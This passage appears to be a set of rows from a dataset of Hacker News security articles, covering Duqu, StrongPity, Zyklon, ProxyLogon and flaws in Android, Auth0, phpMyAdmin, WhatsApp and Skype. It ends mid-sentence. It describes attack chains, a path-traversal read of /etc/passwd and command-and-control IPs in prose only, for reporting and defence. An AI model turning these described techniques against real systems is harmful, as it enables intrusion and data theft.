Theories: Various theories are floating around about the motive and origin of Duqu. One of the interesting one is by @reversemode on twitter. According to him, one of the galaxy pictures comes from 66.49.141.227, which suggests Hebrew connection with Duqu. In the past 1 week, a few more variants have been discovered, but not much can be said about them as it too early. Analysis: Duqu gives the impression of something much bigger coming up than what meets the eye. It is also interesting to note that the techniques used to deploy these attacks are not state of the art. The depth of information that can be extracted using Duqu is no different from what Stuxnet could do. Neither is it any more sophisticated from what we have seen with Aurora. They were intriguing because of the coming together of a possibly destructive operation of their stature. But it's not the same with Duqu. Apart from the complexities it shares with its predecessor, Duqu creators have also used age-old techniques – bad password policy, use of USB drive outside of work and the likes to aid spread the virus. So what is it about this trojan-virus that is catching every eye-ball? Duqu bears testimony to the beginning of an era where cyber war will grow bigger than nuclear and the likes. It is not that we were caught unaware of nation states espionage programs this time. It is the frequency with which they were discovered corroborates the theory that future will see a steep rise in cybercrime. Dealing with this is going to be a major focus for a majority of us security professionals. DUQU in news : Duqu malware was created to spy on Iran's nuclear program Duqu Trojan found in Indian Server Duqu Analysis and Detection Tool by NSS Labs Stuxnet's Son ""Duqu"" Removal Tool released by Bitdefender Windows Kernel Zero Day Vulnerability Found in Duqu Installer ",Malware Searching for Best Encryption Tools? Hackers are Spreading Malware Through Fake Software,https://thehackernews.com/2016/10/best-encryption-tools.html,"Over the past few years, Internet users globally have grown increasingly aware of online privacy and security issues due to mass monitoring and surveillance by government agencies, making them adopt encryption software and services. But it turns out that hackers are taking advantage of this opportunity by creating and distributing fake versions of encryption tools in order to infect as many victims as possible. Kaspersky Lab has revealed an advanced persistent threat (APT) group, nicknamed StrongPity, which has put a lot of efforts in targeting users of software designed for encrypting data and communications. The StrongPity APT group has been using watering-hole attacks, infected installers, and malware for many years to target users of encryption software by compromising legitimate sites or setting up their own malicious copycat sites. Watering hole attacks are designed to lure specific groups of users to their interest-based sites that typically house malicious files or redirect them to attacker-controlled downloads. The StrongPity APT group has managed to infect users in Europe, Northern Africa, and the Middle East and targeted two free encryption utilities in different attacks: WinRAR and TrueCrypt. WinRAR and TrueCrypt are long popular within security and privacy conscious users. WinRAR is best known for its archiving capabilities that encrypting files with AES-256 crypto, while TrueCrypt is a full-disk encryption utility that locks all files on a hard drive. By setting up fake distribution sites that closely mimic legitimate download sites, StrongPity is able to trick users into downloading malicious versions of these encryption apps in hopes that users encrypt their data using a trojanized version of WinRAR or TrueCrypt apps, allowing attackers to spy on encrypted data before encryption occurred. ""The problem with people depending on tools like this isn't the strength of the crypto, but more about how it's distributed,"" says Kurt Baumgartner, principal security researcher at Kaspersky Lab. ""This is that problem that StrongPity is taking advantage of."" Booby-Trapped WinRAR and TrueCrypt Downloads The APT group previously set up TrueCrypt-themed watering holes in late 2015, but their malicious activity surged in end of summer 2016. Between July and September, dozens of visitors have redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on computer systems in Turkey, with some victims in the Netherlands. However, in WinRAR case, instead of redirecting victims to a website controlled by StrongPity, the group hijacked the legitimate winrar.it website to host a malicious version of the file themselves. The winrar.it website infected users mostly in Italy, with some victims in countries like Belgium, Algeria, Tunisia, France, Morocco and Cote D'Ivoire, while the attackers controlled site, winrar.be, infected users in Belgium, Algeria, Morocco, the Netherlands, and Canada. Top Countries infected with StrongPity APT malware According to Kaspersky, more than 1,000 systems infected with StrongPity malware this year. The top five countries affected by the group are Italy, Turkey, Belgium, Algeria and France. The StrongPity APT's dropper malware was signed with ""unusual digital certificates,"" but the group didn't re-use its fake digital certificates. It downloaded components include a backdoor, keyloggers, data stealers and other crypto-related software programs, including the putty SSH client, the filezilla FTP client, the Winscp secure file transfer program and remote desktop clients. The dropper malware not only provides the hackers control of the system, but also allows them to steal disk contents and download other malware that would steal communication and contact information. Therefore, users visiting sites and downloading encryption-enabled software are advised to verify both the validity of the distribution website as well as the integrity of the downloaded file itself. Download sites that not use PGP or any strong digital code signing certificate are required to re-examine the necessity of doing so for the benefits of them as well as their own customers, explained Baumgartner. ",Malware Windows Kernel Zero Day Vulnerability Found in Duqu Installer,https://thehackernews.com/2011/11/windows-kernel-zero-day-vulnerability.html,"Windows Kernel Zero Day Vulnerability Found in Duqu Installer Duqu malware attack exploited a zero-day vulnerability in the Windows kernel, according to security researchers tracking the Stuxnet-like cyber-surveillance Trojan. The vulnerability has since been reported to Microsoft and Microsoft is working on a fix for the kernel vulnerability right now. Researchers at the Laboratory of Cryptography and System Security (CrySyS) in Hungary confirmed the existence of the zero-day vulnerability and exploit in a brief note posted to its web site. Our lab, the Laboratory of Cryptography and System Security (CrySyS) pursued the analysis of the Duqu malware and as a result of our investigation, we identified a dropper file with an MS 0-day kernel exploit inside. We immediately provided competent organizations with the necessary information such that they can take appropriate steps for the protection of the users. The installer file is a Microsoft Word document (.doc) that exploits a previously unknown kernel vulnerability that allows code execution. We contacted Microsoft regarding the vulnerability and they're working diligently towards issuing a patch and advisory. When the file is opened, malicious code executes and installs the main Duqu binaries. The chart below explains how the exploit in the Word document file eventually leads to the installation of Duqu. Other security vendors have reported infections in the following countries: • Austria • Hungary • Indonesia • United Kingdom • Iran - infections different from those observed by Symantec. ""Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. We are working diligently to address this issue and will release a security update for customers through our security bulletin process,"" Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group said in a statement. You can find Symantec updated whitepaper (version 1.3) here. Key updates in the Symantec whitepaper include: • An unpatched zero-day vulnerability is exploited through a Microsoft Word document and installs Duqu • Attackers can spread Duqu to computers in secure zones and control them through a peer-to-peer C&C protocol • Six possible organizations in eight countries have confirmed infections • A new C&C server (77.241.93.160) hosted in Belgium was discovered and has been shut down. [Source] ",Malware "Android ""Fake ID"" Vulnerability Allows Malware to Impersonate Trusted Apps",https://thehackernews.com/2014/07/android-fake-id-vulnerability-allows_29.html,"Due to the majority in the mobile platform, Google's Android operating system has been a prior target for cybercriminals and a recently exposed weakness in the way the operating system handles certificate validation, left millions of Android devices open to attack. Researchers at BlueBox security, who identified the vulnerability, dubbed the flaw as Fake ID, which affects all versions of Android operating system from 2.1 (released in 2010) up to Android 4.4, also known as KitKat. ALL VERSIONS ARE VULNERABLE UPTO KITKAT Researchers marked the vulnerability as critical because it could allow a fake and malicious app to masquerade as a legitimate and trusted application, enabling an attacker to perform various actions such as inserting malicious code into a legitimate app, infiltrating your personal information or even take complete control of an affected device. Specifically, devices running the 3LM administration extension are at risk for a complete compromise, which includes devices from HTC to Pantech, Sharp, Sony Ericsson, and Motorola. ""Every Android application has its own unique identity, typically inherited from the corporate developer's identity,"" Bluebox CTO Jeff Forristal wrote in a blog post published Wednesday. The bug, however, will copy the identifies and use them ""for nefarious purposes."" WHAT IS ""FAKE ID"" ANDROID VULNERABILITY Researchers named the flaw ""Fake ID"" because it allows malicious applications to pass fake credentials to Android OS, which fails to properly verify the application's cryptographic signature. Instead, the operating system grants all the access permissions to the rogue application that it grants to the legitimate app. Actually, in order to establish the identity of the app developer, Android applications are signed using digital certificates. But due to the claimed Fake ID vulnerability, the Android app installer doesn't try to authenticate the certificate chain of a given app, which means an attacker can built an app with a fake identity and impersonate it with extensive privileges such as an Adobe plug-in or Google Wallet. IMPACT AND EXAMPLES In the case of Adobe, the malware app would look like Adobe-trusted code and have the ability to escape the sandbox and run malicious code inside another app, the researchers said. ""For example, an attacker can create a new digital identity certificate, forge a claim that the identity certificate was issued by Adobe Systems, and sign an application with a certificate chain that contains a malicious identity certificate and the Adobe Systems certificate,"" the Bluebox researchers said in a post explaining their discovery. ""Upon installation, the Android package installer will not verify the claim of the malicious identity certificate, and create a package signature that contains the both certificates. This, in turn, tricks the certificate-checking code in the webview plugin manager (who explicitly checks the chain for the Adobe certificate) and allows the application to be granted the special webview plugin privilege given to Adobe Systems – leading to a sandbox escape and insertion of malicious code, in the form of a webview plugin, into other applications."" TARGETING GOOGLE WALLET PAYMENT SYSTEM Researchers also pointed out one more target of an attacker exploiting the Fake ID vulnerability i.e. Google's own Wallet payment system. A malicious app with signature of Google Wallet would allow an attacker to access the NFC (Near Field Communications) chip in the device. The NFC chip in the device is responsible for the storage of payment information used in NFC payments via Google Wallet. This NFC is used in various electronic payment applications and a malicious code can harvest credit card numbers as well. According to Jeff Forristal, the attackers have more ways to exploit Fake ID vulnerability, a bug that he will discuss in a presentation at Black Hat in Las Vegas next week. PATCH RELEASED, BUT YOU CAN'T GET IT IMMEDIATELY Google already released a patch to its partners in April. However, it still leaves a millions of handsets out there that are still vulnerable, as it's up to the carriers themselves to push the updates to users. The vulnerability resides in the Android operating system therefore the new update would be available for the users in the coming period, may be today, a month after or could take a year. As the researchers say, Effectively addressing a vulnerability requires a three step process: Google produces a generic code fix, which it provides to the Android phone manufacturers Then phone manufacturers must then incorporate that fix into a firmware update suitable to specific phones, which they provide to carriers The carrier then distributes the final update, which ensures your phone is safe from the vulnerability As regards Fake ID, Google has provided the generic code fix to the phone manufacturers. Bluebox Security has also built a Scanner to test for the vulnerability and has a couple of ideas for those who still haven't got the patch. Bluebox Security is the same company that uncovered the so-called Android ""Master Key"" vulnerability that allowed an attacker to modify any legitimate and digitally signed application in order to transform it into a Trojan program that could then be used to steal device' information or take control of the device. ",Malware Hackers Exploiting Three Microsoft Office Flaws to Spread Zyklon Malware,https://thehackernews.com/2018/01/microsoft-office-malware.html,"Security researchers have spotted a new malware campaign in the wild that spreads an advanced botnet malware by leveraging at least three recently disclosed vulnerabilities in Microsoft Office. Dubbed Zyklon, the fully-featured malware has resurfaced after almost two years and primarily found targeting telecommunications, insurance and financial services. Active since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over Tor anonymising network and allows attackers to remotely steal keylogs, sensitive data, like passwords stored in web browsers and email clients. Zyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining. Different versions of the Zyklon malware has previously been found being advertised on a popular underground marketplace for $75 (normal build) and $125 ( Tor-enabled build). According to a recently published report by FireEye, the attackers behind the campaign are leveraging three following vulnerabilities in Microsoft Office that execute a PowerShell script on the targeted computers to download the final payload from its C&C server. 1) .NET Framework RCE Vulnerability (CVE-2017-8759)—this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email. Microsoft already released a security patch for this flaw in September updates. 2) Microsoft Office RCE Vulnerability (CVE-2017-11882)—it's a 17-year-old memory corruption flaw that Microsoft patched in November patch update allows a remote attacker to execute malicious code on the targeted systems without requiring any user interaction after opening a malicious document. 3) Dynamic Data Exchange Protocol (DDE Exploit)—this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to perform code execution on the targeted device without requiring Macros to be enabled or memory corruption. As explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrives with an attached ZIP file containing a malicious Office doc file. Once opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer. ""In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,"" the FireEye researchers said. ""The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode."" ""The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework."" Interestingly, the PowerShell script connects to a dotless IP address (example: https://3627732942) to download the final payload. What is Dotless IP Address? If you are unaware, dotless IP addresses, sometimes referred as 'Decimal Address,' are decimal values of IPv4 addresses (represented as dotted-quad notation). Almost all modern web browsers resolve decimal IP address to its equivalent IPV4 address when opened with ""https://"" following the decimal value. For example, Google's IP address 216.58.207.206 can also be represented as https://3627732942 in decimal values (Try this online converter). The best way to protect yourself and your organisation from such malware attacks are always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source. Most importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software—Microsoft Office, in this case—to increase the potential for successful infections. ",Malware Google Discloses Another Unpatched Windows 8.1 Vulnerability,https://thehackernews.com/2015/01/windows-8-hacking-exploit.html,"Google has once again released the details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system before Microsoft planned to patch the bug, triggering a new quarrel between the two tech giants. This is second time in less than a month when the Google's security research team known as Project Zero released details of the vulnerability in Microsoft's operating system, following its 90-day public disclosure deadline policy. Google Project Zero team routinely finds vulnerabilities in different products from different companies. The vulnerabilities then get reported to the affected software vendors and if they do not patch the flaws in 90 days, Google automatically makes the vulnerability along with its details public. DISCLOSURE OF TWO SECURITY HOLES IN LESS THAN A MONTH Two weeks back, Google Project Zero team disclosed details of an elevation of privilege (EoP) vulnerability affecting Windows 8.1 that may have allowed hackers to modify contents or even to take over victims' computers completely, leaving millions of users vulnerable. At the time, Microsoft criticized Google for disclosing the Windows 8.1 security flaw out in the public just before it was planing to fix it. According to Microsoft, the Windows 8.1 vulnerability disclosed by Google may have potentially exposed the users of the operating system to hackers. However, releasing details with the proof of concept for the second security hole in Microsoft's Windows 8.1 just two days before Microsoft planned to patch the bug indicates that Google project zero is determined to stick to its 90-day deadline for fixing software flaws. MICROSOFT vs GOOGLE Though, Microsoft is very upset with 90-day disclosure deadline enforced by Google's Project Zero team. The team notified the new elevation of privilege flaw to Microsoft on 13 October. In November, Microsoft asked Google for an extension of the deadline till February 2015, when it plans to address the issue. However, the search engine giant refused. But later when Microsoft promised to address the vulnerability in January Patch Tuesday, Google still refused to extend its deadline even by two days. ""We asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix,"" said Chris Betz, senior director with Microsoft's Security Response Center, in a blog post Sunday. ""Although following through keeps to Google's announced timeline for disclosure, the decision feels less like principles and more like a 'gotcha', with customers the ones who may suffer as a result."" TECHNICAL DETAILS OF THE NEW EoP FLAW According to Google's security team, User Profile Service is used to create certain directories and mount the user hives as soon as a user logs into a computer. Other than loading the hives, the base profile directory is created under a privileged account, which is secure because normal user requires administrator privileges to do so. ""However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user's token, but this changes to impersonating Local System part of the way through,"" Google said. ""Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile."" A proof-of-concept (PoC) demonstrating the attack on Microsoft's Windows 8.1 operating system has been published, but experts have confirmed that the vulnerability also affects Windows 7. ",Vulnerability Authentication Bypass Vulnerability Found in Auth0 Identity Platform,https://thehackernews.com/2018/04/auth0-authentication-bypass.html,"A critical authentication bypass vulnerability has been discovered in one of the biggest identity-as-a-service platform Auth0 that could have allowed a malicious attacker to access any portal or application, which are using Auth0 service for authentication. Auth0 offers token-based authentication solutions for a number of platforms including the ability to integrate social media authentication into an application. With over 2000 enterprise customers and managing 42 million logins every day and billions of login per month, Auth0 is one of the biggest identity platforms. While pentesting an application back in September 2017, researchers from security firm Cinta Infinita discovered a flaw (CVE-2018-6873) in Auth0's Legacy Lock API, which resides due to improper validation of the JSON Web Tokens (JWT) audience parameter. Researchers successfully exploited this issue to bypass login authentication using a simple cross-site request forgery (CSRF/XSRF) attack against the applications running over Auth0 authentication. Auth0's CSRF vulnerability (CVE-2018-6874) allows an attacker to reuse a valid signed JWT generated for a separate account to access the targeted victim's account. For this, all an attacker needs is the victim's user ID or email address, which can be obtained using simple social engineering tricks. Video Demonstration of the Attack According to the researchers, the attack is reproducible against many organisations, ""as long as we know the expected fields and values for the JWT. There is no need of social engineering in most of the cases we saw. Authentication for applications that use an email address or an incremental integer for user identification would be trivially bypassed."" The security firm reported the vulnerability to the Auth0 Security Team in October 2017. The company acted very fast and addressed the weakness in less than 4 hours. However, since the vulnerable SDK and supported libraries of Auth0 have been implemented on the client side, Auth0 took almost six months to contact each of their customers and help them fix this vulnerability, before publicly disclosing this issue. ""Unlike the fix for the special case discovered by Cinta Infinita, this issue could not be solved without forcing our customers to upgrade the libraries/SDKs on their end, a much more significant undertaking,"" the Auth0 team said in its advisory. The company has mitigated the vulnerabilities by extensively rewriting the affected libraries and releasing new versions of its SDKs (auth0.js 9 and Lock 11). Cinta Infinita also waited six months before publicly disclosing the vulnerability, giving the Auth0 team enough time to update all their Private SaaS Appliances (on-premises) as well. The security firm has now released a proof-of-concept (PoC) video, demonstrating how they obtained the victim's user id and bypass password authentication when logging into Auth0's Management Dashboard by forging an authentication token. ",Vulnerability Zeus malware targeting BlackBerry and Android devices,https://thehackernews.com/2012/08/zeus-malware-targeting-blackberry-and.html,"Security researchers at Kaspersky Lab have discovered five new samples of the ZeuS-in-the-Mobile (ZitMo) malware package, targeting Android and BlackBerry devices. Zitmo (Zeus in the mobile) is the name given to the mobile versions of Zeus, and it's been around for a couple of years already, mostly infecting Android phones. The Zitmo variant has reportedly been operating for at least two years targeting Android phones by masquerading as banking security application or security add-on. ZitMo gets hold of banking information by intercepting all text messages and passing them on to attackers' own devices. It gets onto devices inside malicious applications, which users are duped into downloading. In this case, the malicious app was posing as security software called 'Zertifikat'. Once installed, the packages forward all incoming SMS messages to one of two command and control numbers located in Sweden, with the aim of snaring secure codes and other data. Kaspersky found mobile users in Spain, Italy and Germany were targeted by these fresh variants, with two command and control (C&C) numbers found on Sweden's Tele2 operator. ""The analysis of new Blackberry ZitMo files showed that there are no major changes. Virus writers finally fixed grammar mistake in the 'App Instaled OK' phrase, which is sent via SMS to C&C cell phone number when smartphone has been infected. Instead of 'BLOCK ON' or 'BLOCK OFF' commands (blocking or unblocking all incoming and outgoing calls) now there are 'BLOCK' and 'UNBLOCK' commands. Other commands which are received via SMS remain the same."" Denis Maslennikov, a researcher at Kaspersky Lab. The tactic is designed to help the criminals circumvent the out-of-band authentication systems used by many European banks, by hijacking the one-time password authentication password sent via SMS. Earlier this year, Kaspersky warned of a set of malicious Android applications posing as security software. Zeus was sitting behind those apps, ready to siphon off text messages. ",Vulnerability Critical Flaw Reported In phpMyAdmin Lets Attackers Damage Databases,https://thehackernews.com/2018/01/phpmyadmin-hack.html,"A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link. Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7). Cross-site request forgery vulnerability, also known as XSRF, is an attack wherein an attacker tricks an authenticated user into executing an unwanted action. According to an advisory released by phpMyAdmin, ""by deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables, etc."" phpMyAdmin is a free and open source administration tool for MySQL and MariaDB and is widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms. Moreover, a lot of hosting providers use phpMyAdmin to offer their customers a convenient way to organize their databases. Barot has also released a video, as shown above, demonstrating how a remote attacker can make database admins unknowingly delete (DROP) an entire table from the database just by tricking them into clicking a specially crafted link. ""A feature of phpMyAdmin was using a GET request and after that POST request for Database operations such as DROP TABLE table_name; GET requests must be protected against CSRF attacks. In this case, POST requests were used which were sent through URL (for bookmarking purpose may be); it was possible for an attacker to trick a database admin into clicking a button and perform a drop table database query of the attacker's choice."" Barot explains in a blog post. However, performing this attack is not simple as it may sound. To prepare a CSRF attack URL, the attacker should be aware of the name of targeted database and table. ""If a user executes a query on the database by clicking insert, DROP, etc. buttons, the URL will contain database name and table name,"" Barot says. ""This vulnerability can result in the disclosure of sensitive information as the URL is stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc."" Barot reported the vulnerability to phpMyAdmin developers, who confirmed his finding and released phpMyAdmin 4.7.7 to address this issue. So administrators are highly recommended to update their installations as soon as possible. ",Vulnerability Internet Traffic Hijacking Linux Flaw Affects 80% of Android Devices,https://thehackernews.com/2016/08/hack-linux-android.html,"An estimated 80 percent of Android smartphones and tablets running Android 4.4 KitKat and higher are vulnerable to a recently disclosed Linux kernel flaw that allows hackers to terminate connections, spy on unencrypted traffic or inject malware into the parties' communications. Even the latest Android Nougat Preview is considered to be vulnerable. The security flaw was first appeared in the implementation of the TCP protocol in all Linux systems deployed since 2012 (version 3.6 and above of the Linux OS kernel) and the Linux Foundation has already patched the Linux kernel on July 11, 2016. However, the vulnerability (CVE-2016-5696) is now affecting a large portion of the Android ecosystem. According to a blog post published Monday by mobile security firm Lookout, the Linux flaw is present in Android version 4.4 KitKat and all future releases, including the latest developer preview of Android Nougat. Around 1.4 BILLLLLION Android Devices Affected This means that 80% of all Android devices in use today, which is nearly 1.4 Billion devices, are vulnerable to attacks, enabling hackers to spy on your communications without even compromising your network via man-in-the-middle-attack. However, the good news is that the Linux vulnerability is complicated and difficult to exploit, but the risk is there especially for targeted attacks. ""While a man-in-the-middle attack is not required here, the attacker still needs to know a source and destination IP address to successfully execute the attack,"" Lookout stated in the blog post. Windows and Macs are not affected by the vulnerability. According to Google, engineers are already aware of the vulnerability and are ""taking the appropriate actions"" to fix the issue, a Google representative told Ars Technica. So, it is likely that a patch for Android will arrive soon. Temporary Mitigation: Make sure your Internet traffic is encrypted: Apps you use and Websites you visit should employ HTTPS. Use a Virtual Private Network (VPN). To know more about the Linux kernel flaw and its mitigation, you can head on to our post, titled ""Linux TCP Flaw allows Hackers to Hijack Internet Traffic and Inject Malware Remotely."" ",Vulnerability Vulnerability in Whatsapp messenger media server,https://thehackernews.com/2013/06/Hacking-whatsapp-android-application.html,"If you own an iPhone or an Android device, then the chances are high that you're familiar with the extremely popular cross-platform messaging app, WhatsApp. According to a whitehat hacker Mohammed Saeed, Whatsapp media server (media.whatsapp.com) interface was vulnerable to Traversal local file inclusion. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. Flaw allowed hacker to gather usernames via an ""/etc/passwd"" file and also another sensitive files like log files i.e ""/apache/logs/error.log"" or ""/apache/logs/access.log"". Flaw was reported by Mohammed with proof of conpect to Whatsapp security team on 27th May and was addressed this week. If you are also penetration tester and have something buggy that can help Whatsapp team to make there service more secure, feel free to contact them at support@whatsapp.com. ",Vulnerability Microsoft Won't Patch a Severe Skype Vulnerability Anytime Soon,https://thehackernews.com/2018/02/hacking-skype.html,"A serious vulnerability has been discovered in Microsoft-owned most popular free web messaging and voice calling service Skype that could potentially allow attackers to gain full control of the host machine by granting system-level privileges to a local, unprivileged user. The worst part is that this vulnerability will not be patched by Microsoft anytime soon. It's not because the flaw is unpatchable, but because fixing the vulnerability requires a significant software rewrite, which indicates that the company will need to issue an all-new version of Skype rather than just a patch. The vulnerability has been discovered and reported to Microsoft by security researcher Stefan Kanthak and resides in Skype's update installer, which is susceptible to Dynamic Link Libraries (DLL) hijacking. According to the researcher, a potential attacker could exploit the ""functionality of the Windows DLL loader where the process loading the DLL searches for the DLL to be loaded first in the same directory in which the process binary resides and then in other directories."" The exploitation of this preferential search order would allow the attacker to hijack the update process by downloading and placing a malicious version of a DLL file into a temporary folder of a Windows PC and renaming it to match a legitimate DLL that can be modified by an unprivileged user without having any special account privileges. When Skype's update installer tries to find the relevant DLL file, it will find the malicious DLL first, and thereby will install the malicious code. Although Kanthak demonstrated the attack using the Windows version of Skype, he believes the same DLL hijacking method could also work against other operating systems, including Skype versions for macOS and Linux. Kanthak informed Microsoft of the Skype vulnerability back in September, but the company told him that the patch would require the Skype update installer go through ""a large code revision,"" Kanthak told ZDNet. So rather than releasing a security update, Microsoft decided to build an altogether new version of the Skype client that would address the vulnerability. It should be noted that this vulnerability only affects the Skype for the desktop app, which uses its update installer which is vulnerable to the DLL hijacking technique. The Universal Windows Platform (UWP) app version available from the Microsoft Store for Windows 10 PCs is not affected. The vulnerability has been rated as ""medium"" in severity, but Kanthak said, ""the attack could be easily weaponized."" He gave two examples, which have not been released yet. Until the company issues an all-new version of Skype client, users are advised to exercise caution and avoid clicking on attachments provided in an email. Also, make sure you run appropriate and updated anti-virus software that offers some defence against such attacks. This is not the first time Skype has been dealing with a severe security flaw. In June 2017, a critical flaw in Skype was revealed before Microsoft released a fix for the issue that allowed hackers to crash systems and execute malicious code in them. Last month, among several messaging applications, Skype was also dealing with a critical remote code execution vulnerability in Electron—a popular web application framework widely-used in desktop applications. ",Vulnerability Plugx RAT targeting government organizations in Japan using spear phishing,https://thehackernews.com/2012/09/plugx-rat-targeting-government.html,"Roland Dela Paz (Threat Researcher) at TrendMirco reported that last year a Malware Campaign to target specific users in Japan, China, and Taiwan once again on rise using new breed of Remote Access Tool (RAT) called Plugx (also known as Korplug). This new custom made version comes for less recognition and more elusiveness from security researchers. He also mention that last year campaign used the Poison Ivy RAT, but now its Plugx take its place. ""Similar to previous Poison Ivy campaigns, it also arrives as an attachment to spear-phished emails either as an archived, bundled file or specially crafted document that exploits a vulnerability in Adobe Acrobat Reader or Microsoft Office. We've also encountered an instance of Plugx aimed at a South Korean Internet company and a U.S. engineering firm."" Roland mentioned. The attached pdf exploits CVE-2010-2883 (with Plugx (RAT) payload connects to a command and control (C&C) server named {BLOCKED}eo.flower-show.org. CVE-2010-2883: Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010) This C&C server appeared to be have been used by Poison Ivy and PlugX variants. According to Roland this rat drop a file at %System Root%\Documents and Settings\All Users\SxS\bug.log which contain it own errors and then possibly it uploads back to attacker server for Auditing. This shows that , this variant is still in beta stage. Trend Micro monitoring PlugX's development and We at THE HACKER NEWS, will update you with new info when published. ",Vulnerability ProxyLogon PoC Exploit Released; Likely to Fuel More Disruptive Cyber Attacks,https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html,"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on Wednesday issued a joint advisory warning of active exploitation of vulnerabilities in Microsoft Exchange on-premises products by nation-state actors and cybercriminals. ""CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack,"" the agencies said. ""Adversaries may also sell access to compromised networks on the dark web."" The attacks have primarily targeted local governments, academic institutions, non-governmental organizations, and business entities in various industry sectors, including agriculture, biotechnology, aerospace, defense, legal services, power utilities, and pharmaceutical, which the agencies say are in line with previous activity conducted by Chinese cyber actors. Tens of thousands of entities, including the European Banking Authority and the Norwegian Parliament, are believed to have been breached to install a web-based backdoor called the China Chopper web shell that grants the attackers the ability to plunder email inboxes and remotely access the target systems. The development comes in light of the rapid expansion of attacks aimed at vulnerable Exchange Servers, with multiple threat actors exploiting the vulnerabilities as early as February 27 before they were eventually patched by Microsoft last week, swiftly turning what was labeled as ""limited and targeted"" into an indiscriminate mass exploitation campaign. While there is no concrete explanation for the widespread exploitation by so many different groups, speculations are that the adversaries shared or sold exploit code, resulting in other groups being able to abuse these vulnerabilities, or that the groups obtained the exploit from a common seller. From RCE to Web Shells to Implants On March 2, 2021, Volexity publicly disclosed the detection of multiple zero-day exploits used to target flaws in on-premises versions of Microsoft Exchange Servers, while pegging the earliest in-the-wild exploitation activity on January 3, 2021. Successful weaponization of these flaws, called ProxyLogon, allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network. Although Microsoft initially pinned the intrusions on Hafnium, a threat group that's assessed to be state-sponsored and operating out of China, Slovakian cybersecurity firm ESET on Wednesday said it identified no fewer than 10 different threat actors that likely took advantage of the remote code execution flaws to install malicious implants on victims' email servers. Apart from Hafnium, the five groups detected as exploiting the vulnerabilities prior to the patch release are Tick, LuckyMouse, Calypso, Websiic, and Winnti (aka APT41 or Barium), with five others (Tonto Team, ShadowPad, ""Opera"" Cobalt Strike, Mikroceen, and DLTMiner) scanning and compromising Exchange servers in the days immediately following the release of the fixes. No conclusive evidence has emerged so far connecting the campaign to China, but DomainTools' Senior Security Researcher Joe Slowik noted that several of the aforementioned groups have been formerly linked to China-sponsored activity, including Tick, LuckyMouse, Calypso, Tonto Team, Mikroceen, and the Winnti Group, indicating that Chinese entities other than Hafnium are tied to the Exchange exploitation activity. ""It seems clear that there are numerous clusters of groups leveraging these vulnerabilities, the groups are using mass scanning or services that allow them to independently target the same systems, and finally there are multiple variations of the code being dropped, which may be indicative of iterations to the attack,"" Palo Alto Networks' Unit 42 threat intelligence team said. In one cluster tracked as ""Sapphire Pigeon"" by researchers from U.S.-based Red Canary, attackers dropped multiple web shells on some victims at different times, some of which were deployed days before they conducted follow-on activity. According to ESET's telemetry analysis, more than 5,000 email servers belonging to businesses and governments from over 115 countries are said to have been affected by malicious activity related to the incident. For its part, the Dutch Institute for Vulnerability Disclosure (DIVD) reported Tuesday that it found 46,000 servers out of 260,000 globally that were unpatched against the heavily exploited ProxyLogon vulnerabilities. Troublingly, evidence points to the fact that the deployment of the web shells ramped up following the availability of the patch on March 2, raising the possibility that additional entities have opportunistically jumped in to create exploits by reverse engineering Microsoft updates as part of multiple, independent campaigns. ""The day after the release of the patches, we started to observe many more threat actors scanning and compromising Exchange servers en masse,"" said ESET researcher Matthieu Faou. ""Interestingly, all of them are APT groups focused on espionage, except one outlier that seems related to a known coin-mining campaign (DLTminer). It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later."" Aside from installing the web shell, other behaviors related to or inspired by Hafnium activity include conducting reconnaissance in victim environments by deploying batch scripts that automate several functions such as account enumeration, credential-harvesting, and network discovery. Public Proof-of-Concept Available Complicating the situation further is the availability of what appears to be the first functional public proof-of-concept (PoC) exploit for the ProxyLogon flaws despite Microsoft's attempts to take down exploits published on GitHub over the past few days. ""I've confirmed there is a public PoC floating around for the full RCE exploit chain,"" security researcher Marcus Hutchins said. ""It has a couple 